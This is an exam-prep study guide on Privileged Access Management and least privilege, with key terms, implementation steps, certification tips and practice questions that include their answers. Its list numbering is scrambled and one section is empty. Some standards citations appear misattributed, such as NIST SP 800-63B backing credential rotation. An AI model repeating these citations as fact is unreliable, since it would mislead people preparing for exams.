Principles of Information Security: Privileged Access Management (PAM) and Least Privilege

Privileged Access Management (PAM) and Least Privilege

Privileged Access Management (PAM) & Least Privilege – Exam-Ready Study Guide

What This Is

Privileged Access Management (PAM) is the process of controlling, monitoring, and securing elevated ("privileged") access to critical systems, data, and infrastructure. Least Privilege is the principle of granting users, accounts, or processes only the minimum permissions needed to perform their tasks—nothing more. These concepts are foundational because 80% of breaches involve privileged credential abuse (Forrester). A real-world example: The 2020 Twitter Bitcoin Scam occurred when attackers phished a Twitter employee’s credentials, then used internal admin tools to hijack high-profile accounts (e.g., Elon Musk, Barack Obama). Without PAM and least privilege, a single compromised account can escalate into a full-scale breach.

Key Terms & Concepts

• PAM (Privileged Access Management): A framework to secure, monitor, and audit privileged accounts (e.g., admins, service accounts). Tools: CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
• Least Privilege (Principle of Least Privilege, PoLP): Users/processes get only the permissions necessary for their role. Aligns with NIST SP 800-53 (AC-6) and ISO 27001 (A.9.2.3).
• Privileged Account: Any account with elevated permissions (e.g., domain admin, root, database admin, cloud IAM roles).
• Just-in-Time (JIT) Access: Temporary, time-bound privileged access granted only when needed (e.g., via PAM workflows). Reduces "standing privilege" risk.
• Session Monitoring: Real-time recording and auditing of privileged sessions (e.g., CyberArk PSM, BeyondTrust Privilege Remote Access). Required by PCI DSS 3.2.1 (Req. 10.2.5).
• Credential Vaulting: Secure storage of privileged credentials (e.g., passwords, SSH keys) in an encrypted repository. Prevents hardcoding in scripts/configs.
• Privilege Escalation: An attack where a user gains higher-level permissions than intended (e.g., MITRE ATT&CK T1068). Defenses: PAM + least privilege + patching.
• Service Account: Non-human accounts used by applications/services (e.g., sql_svc). Often over-permissioned; NIST SP 800-63B recommends rotating credentials.
• Break-Glass Account: Emergency admin accounts with highly restricted, audited access (e.g., used during outages). Stored in a physical safe or HSM (Hardware Security Module).
• Shared Account: Multiple users sharing one credential (e.g., admin/admin). Anti-pattern—violates accountability. Replace with individual accounts + PAM.
• Zero Standing Privileges (ZSP): No permanent privileged access; all access is JIT and ephemeral. Aligns with Google’s BeyondCorp model.
• PAM Lifecycle: Provision-Monitor-Audit-Deprovision. Tools automate this (e.g., SailPoint, Okta Privileged Access).

Step-by-Step / Process Flow

How to Implement PAM & Least Privilege

1. Discover & Inventory Privileged Accounts
2. Use automated tools (e.g., BloodHound, CyberArk Discovery, Tenable.io) to scan for:
   • Local admin accounts
   • Service accounts (e.g., svc_sql)
   • Cloud IAM roles (e.g., AWS AdministratorAccess)
   • Default credentials (e.g., admin:password)

3. Output: A list of all privileged accounts and their permissions.

4. Enforce Least Privilege

5. Remove unnecessary permissions (e.g., revoke Domain Admin from helpdesk staff).
6. Replace shared accounts with individual accounts + PAM.
7. Implement role-based access control (RBAC) (e.g., AWS IAM Roles, Azure RBAC).

8. Use JIT access for temporary needs (e.g., CyberArk’s "Request Access" workflow).

9. Secure & Vault Credentials

10. Store passwords/SSH keys in a PAM vault (e.g., HashiCorp Vault, AWS Secrets Manager).
11. Rotate credentials automatically (e.g., every 90 days for humans, every 30 days for service accounts).

12. Eliminate hardcoded secrets in scripts/configs (e.g., replace password=12345 with API calls to the vault).

13. Monitor & Audit Privileged Sessions

14. Record all privileged sessions (e.g., CyberArk PSM, BeyondTrust).
15. Alert on suspicious activity (e.g., admin logging in at 3 AM, unusual command execution).

16. Integrate with SIEM (e.g., Splunk, IBM QRadar) for correlation with other events.

17. Deprovision & Review

18. Automate deprovisioning when employees leave or roles change (e.g., Okta + PAM integration).
19. Conduct quarterly access reviews (e.g., NIST SP 800-53 (AC-2)).
20. Test with red teaming (e.g., simulate a MITRE ATT&CK T1078 privilege escalation attack).

Common Mistakes

Certification Exam Tips

CISSP

• Management vs. Technical: CISSP focuses on governance, risk, and compliance (GRC). Know how PAM aligns with NIST, ISO 27001, and COBIT.
• Scenario Questions: Expect questions like:

  "A company wants to reduce the risk of privileged account abuse. Which of the following is the MOST effective control?" Answer: Implement a PAM solution with JIT access and session monitoring. (Other options might include "password complexity" or "MFA," but PAM is the most comprehensive answer.)

Security+

• Least Privilege vs. Separation of Duties (SoD):
• Least Privilege = Minimum permissions needed.
• SoD = Splitting tasks to prevent fraud (e.g., one person approves payments, another processes them).
• PAM Tools: Know CyberArk, BeyondTrust, and HashiCorp Vault (even if you don’t use them).

CEH

• Attacker Perspective: CEH tests how attackers exploit weak PAM. Know:
• Pass-the-Hash (PtH) (MITRE T1550.002) – Stealing hashed credentials to move laterally.
• Kerberoasting (MITRE T1558.003) – Cracking service account passwords.
• Defenses: PAM + credential vaulting + least privilege.

Quick Check Questions

1. A sysadmin needs temporary root access to a Linux server to troubleshoot an issue. Which PAM feature should be used to minimize risk?
2. A) Permanent sudo access
3. B) Just-in-Time (JIT) access
4. C) Shared admin account

5. D) Passwordless authentication ? Correct Answer: B) Just-in-Time (JIT) access Explanation: JIT grants temporary, time-bound access, reducing the window of opportunity for misuse.

6. During a security audit, an analyst discovers that a database service account has "db_owner" permissions but is only used to run backups. What is the BEST remediation?

7. A) Delete the account
8. B) Apply the principle of least privilege
9. C) Enable MFA for the account

10. D) Rotate the password ? Correct Answer: B) Apply the principle of least privilege Explanation: The account should only have backup-specific permissions (e.g., db_backupoperator), not full db_owner.

11. Which of the following is a PRIMARY benefit of session monitoring in PAM?

12. A) Reducing password complexity requirements
13. B) Detecting and recording privileged user activity
14. C) Automating user provisioning
15. D) Encrypting data at rest ? Correct Answer: B) Detecting and recording privileged user activity Explanation: Session monitoring provides audit trails for forensic investigations and insider threat detection.

Last-Minute Cram Sheet

1. PAM = Privileged Access Management – Controls, monitors, and secures admin accounts.
2. Least Privilege = Minimum permissions needed (NIST SP 800-53 AC-6).
3. JIT = Just-in-Time access – Temporary, time-bound privileges.
4. Credential Vaulting – Secure storage of passwords/SSH keys (e.g., CyberArk, HashiCorp Vault).
5. Session Monitoring – Records privileged sessions (required by PCI DSS 10.2.5).
6. Service Accounts – Non-human accounts; high-risk if over-permissioned.
7. Break-Glass Accounts – Emergency admin accounts; stored in a physical safe or HSM.
8. Zero Standing Privileges (ZSP) – No permanent admin access; all access is JIT.
9. Common Exam Trap: "PAM is only for human admins"-False (includes service accounts, cloud roles, etc.).
10. Another Trap: "Least privilege means no admin access"-False (it means only necessary admin access).